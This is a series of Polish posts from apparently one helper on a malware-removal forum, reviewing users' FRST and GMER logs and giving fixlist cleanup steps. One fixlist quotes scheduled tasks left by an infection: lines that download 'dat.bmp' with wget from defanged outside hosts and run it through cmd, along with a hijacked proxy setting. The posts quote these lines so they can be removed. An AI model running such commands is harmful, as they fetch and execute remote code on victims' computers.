jessica

W logach nie widzę żadnej infekcji. Co do problemu: pewnie ten program nie pasuje do Twego komputera - ale to tylko mój luźny domysł. Z tym musisz czekać na @Picasso - nie wiem, kiedy znów zacznie pomagać na forum. Drobna kosmetyka: Otwórz Notatnik i wklej w nim: HKLM\...\Run: [KernelFaultCheck] => %systemroot%\system32\dumprep 0 -k PF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab DPF: {CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab S3 gdrv; \??\C:\WINDOWS\gdrv.sys [X] EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). jessi

W logach nie widać żadnej infekcji. Nie ma też widocznych żadnych ograniczeń nałożonych na *.exe. Tak więc pozostaje tylko czekanie na @Picasso - nie wiem, kiedy znów zacznie pomagać na forum. Tylko kosmetyka: Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). jessi

co to jest?

W logu GMER - nic podejrzanego. jessi

chyba została usunięta ta wartość klucza. jessi

Są ślady po infekcji, ale poza tym - nic podejrzanego. Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). Uaktualnij Javę, wg https://www.fixitpc.pl/topic/5-dezynfekcja-kroki-finalizuj%C4%85ce-temat/?do=findComment&comment=179769 Oczywiście zalecenia Moderatora wykonaj - mój post tego nie zmienia. jessi

Oby to nie była chwilowa poprawa. jessi

Nic tu nie wskazuje na istnienie ZeroAcces, ani żadnej innej infekcji. Tylko kosmetyka: twórz Notatnik i wklej w nim: CustomCLSID: HKU\S-1-5-21-839522115-1303643608-1417001333-1003_Classes\CLSID\{010833F3-751A-402F-9FCC-C365B6A12E41}\localserver32 -> C:\DOCUME~1\Dawid\Pulpit\BESTPL~1.EXE => Brak pliku Task: C:\WINDOWS\Tasks\SYSTEM.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/grogle.in/dat.bmp?data=1q1vWhzPgW;Raxco.PerfectDisk.v13.0.821.exe;1420484096 & start cmd /R dat.bmp <==== UWAGA Task: C:\WINDOWS\Tasks\SYSTEMDOWN.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/sdshdb.nl/index.php?data=Z6dtuSqiU9;up;1421768315 & start cmd /R dat.bmp Task: C:\WINDOWS\Tasks\SYSTEMUP.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/iashdb.in/index.php?data=k5XKOx8fDI;up;1421768299 & start cmd /R dat.bmp HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\58053762.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\58053762.sys => ""="Driver" HKLM\...\Run: [KernelFaultCheck] => %systemroot%\system32\dumprep 0 -k HKLM\...\Winlogon: [Userinit] C:\WINDOWS\system32\userinit.exe,C:\Program Files\G DATA\TotalProtection\AVKTray\AVKTray.exe,C:\Program Files\G DATA\TotalProtection\AVKKid\AVKCKS.exe, ProxyServer: [S-1-5-21-839522115-1303643608-1417001333-1003] => http=222.66.115.233:80 AutoConfigURL: [S-1-5-21-839522115-1303643608-1417001333-1003] => http=222.66.115.233:80 BHO: IplexToALLPlayer -> {DF925EF3-7A87-44E4-9CAF-8D7B280BF616} -> C:\PROGRA~1\ALLPLA~1\Iplex\IPLEXT~1.DLL => Brak pliku DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab DPF: {CAFEEFAC-0017-0000-0045-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab S3 MozillaMaintenance; "C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe" [X] S3 WMPNetworkSvc; "C:\Program Files\Windows Media Player\wmpnetwk.exe" [X] R3 GDKBFlt; C:\WINDOWS\system32\drivers\GDKBFlt32.sys [20096 2015-04-10] (G Data Software AG) C:\WINDOWS\system32\drivers\GDKBFlt32.sys S3 CrystalSysInfo; \??\C:\Program Files\MediaCoder\SysInfo.sys [X] S4 hpt3xx; Brak ImagePath S4 IntelIde; Brak ImagePath S3 LgBttPort; system32\DRIVERS\lgbtport.sys [X] S3 lgbusenum; system32\DRIVERS\lgbtbus.sys [X] S3 LGVMODEM; system32\DRIVERS\lgvmodem.sys [X] S3 Passthru; system32\DRIVERS\PPFlt.sys [X] S3 usbbus; system32\DRIVERS\lgusbbus.sys [X] S3 UsbDiag; system32\DRIVERS\lgusbdiag.sys [X] S3 USBModem; system32\DRIVERS\lgusbmodem.sys [X] C:\WINDOWS\Minidump\Mini*.dmp HOSTS: EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). jessi

Możesz, choć raczej tego w logach nie będzie widać. jessi

Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). jessi

Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). Przejrzałam różne fora, na których próbowano to wykryć i usunąć: nigdzie tego nie udało się wykryć, a więc i nigdzie nie udało się usunąć. Przeinstaluj przeglądarki, na których to występuje. jessi

1) Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). 2) Zrób nowe logi FRST. Przed skanem zaznacz "Addition.txt" oraz "Shortcut.txt" 3) Napisz, czy to poprawiło sytuację? jessi

Tak, to już wszystko. jessi

Nie widzę tu aktywnej infekcji. Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). jessi

Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). Wg mnie temat powinien zostać przesunięty do działu HARDWARE. Ale to nie ode mnie zależy. jessi

Log GMER - jest pusty (0 kb) W logach FRST nie widzę niczego podejrzanego. Cybertarcza zbyt często się myli, nie da się jej traktować poważnie. jessi

W logach GMER oraz Shortcut - nic podejrzanego. Do logów FRST.txt oraz Addition.txt nie mam dostępu, z nieznanych mi powodów - do tej pory miałam dostęp do załączników forum. jessi

Czy ten folder "bez nazwy" dalej jest? Jeśli tak, to usuń go poprzez SHIFT+DEL Jeśli nie ma - to kończymy: W USBFix kliknij na przycisk UNINSTALL. Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW). przez SHIFT+DEL usuń pozostały folder C:\FRST jessi

Może na wszelki wypadek dasz logi? jessi

Cybertarcza to głównie fałszywe alarmy, więc trudno to traktować poważnie. W logach nie ma niczego podejrzanego. Tylko kosmetyka: Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). jessi

Nie widzę tu żadnej infekcji. Kosmetyka: Otwórz Notatnik i wklej w nim: >>Menu Notatnika >> Plik >> >>Zapisz jako >> Nazwa pliku: fixlist Zapisz jako typ: Dokumenty tekstowe Kodowanie: Unicode >>Zapisz Plik umieść w folderze C:\Users\Ksenia\Downloads Uruchom FRST i kliknij przycisk Fix (NAPRAW). jessi

Kod 50 to problem czysto sprzętowy, więc nie bardzo rozumiem, co to ma wspólnego z antywirusem. Wg mnie temat powinien być przesunięty do działu HARDWARE. Ale to nie zależy ode mnie. Usuniemy pozostałości po programach ochronnych, bo może one blokują instalację nowego antywirusa: Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). jessi

1) Użyj >USBFix (aby pobrać kliknij na "Download UsbFix Windows Installer") Kliknij w nim na: CLEAN. Daj raport z tego usuwania. 2) Kosmetyka: Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). jessi

Wprawdzie to nie jest wynik wyszukiwania, ale z logu wynika, że jest OK. Kończymy: Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW). przez SHIFT+DEL usuń pozostały folder C:\FRST. W Adw-Cleaner kliknij na przycisk Odinstaluj (UNINSTALL). jessi

W logach nie widzę "cherimoya". Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW).Uruchom FRST. W polu SEARCH (SZUKAJ) wklej: kliknij na przycisk "Search Files (Szukaj Plików)". Raport z tego będzie tam, gdzie jest FRST. Uruchom FRST. W polu SEARCH (SZUKAJ) wklej: kliknij na przycisk "Search Registry" (Szukaj w Rejestrze). Raport z tego będzie tam, gdzie jest FRST. jessi